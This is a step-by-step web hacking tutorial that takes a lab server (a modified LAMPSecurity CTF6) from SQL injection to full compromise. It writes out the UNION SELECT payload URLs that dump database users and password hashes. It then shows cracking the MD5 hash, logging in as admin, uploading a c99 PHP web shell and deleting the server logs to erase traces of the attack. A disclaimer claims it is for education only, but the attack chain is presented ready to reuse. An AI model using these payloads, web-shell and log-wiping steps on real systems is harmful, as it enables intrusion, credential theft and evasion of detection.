Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now

Code:

http://192.168.132.128/

Step 2:

I went through all the pages of web site and found a page with URL input

Code:

http://192.168.132.128/?id=13

Step 3:

I launched Hackbar by pressing F9





Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:

http://192.168.132.128/?id=13'

Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables

Code:

http://192.168.132.128/?id=13 order by 1

Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage

Code:

http://192.168.132.128/?id=13 order by 7

Step 7:

I went up to 7 and no change till now

Code:

http://192.168.132.128/?id=13 order by 7

Step 8:

I'm on 8 now and I can see the page changed

Code:

http://192.168.132.128/?id=13 order by 8

Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT






Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables






Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

5.0.45 is the version



Step 14:

Let me list all the tables

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

Step 16:

I want columns from the table "user" and nothing else

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

Step 17:

Lets find the user name

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Step 18:

Now, what about password

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com






Step 20:

Voila.!!! I got the password






Step 21:

Finding the log in page. Its was right in front of me





Step 22:

Logging in with the credentials I have





Step 23:

Greetings.!!!






Step 24:

I'm an admin now. Look at my powers.






Step 25:

Let me add an event






Step 26:

and of course I want to upload a picture






Step 27:

Lets see it allows me to upload the shell or not






Step 28:

Now I'm pressing on "Add Event" button






Step 29:

Nice. Looks like it's got uploaded






Step 30:

Let's see where the shell got uploaded to






Step 31:

I'm trying to get the default upload location









Step 32:

Looks like I got it




Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access






Step 34:

I simply clicked on the up button to get the root folder




Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder







Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks






Step 37:

Let me go back and edit the log file









Step 38:

I deleted complete log entries. Now saving it.






Step 39:

Nice. Log file is empty now






Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove






Step 41:

Confirmed.!!!






Step 42:

OK. Good Bye C99






Step 43:

Well. It got deleted itself




Reference:

1. Infond tutorial

Happy Hacking.!!! 

======================================================================

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Scanning Server & Web Hacking is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.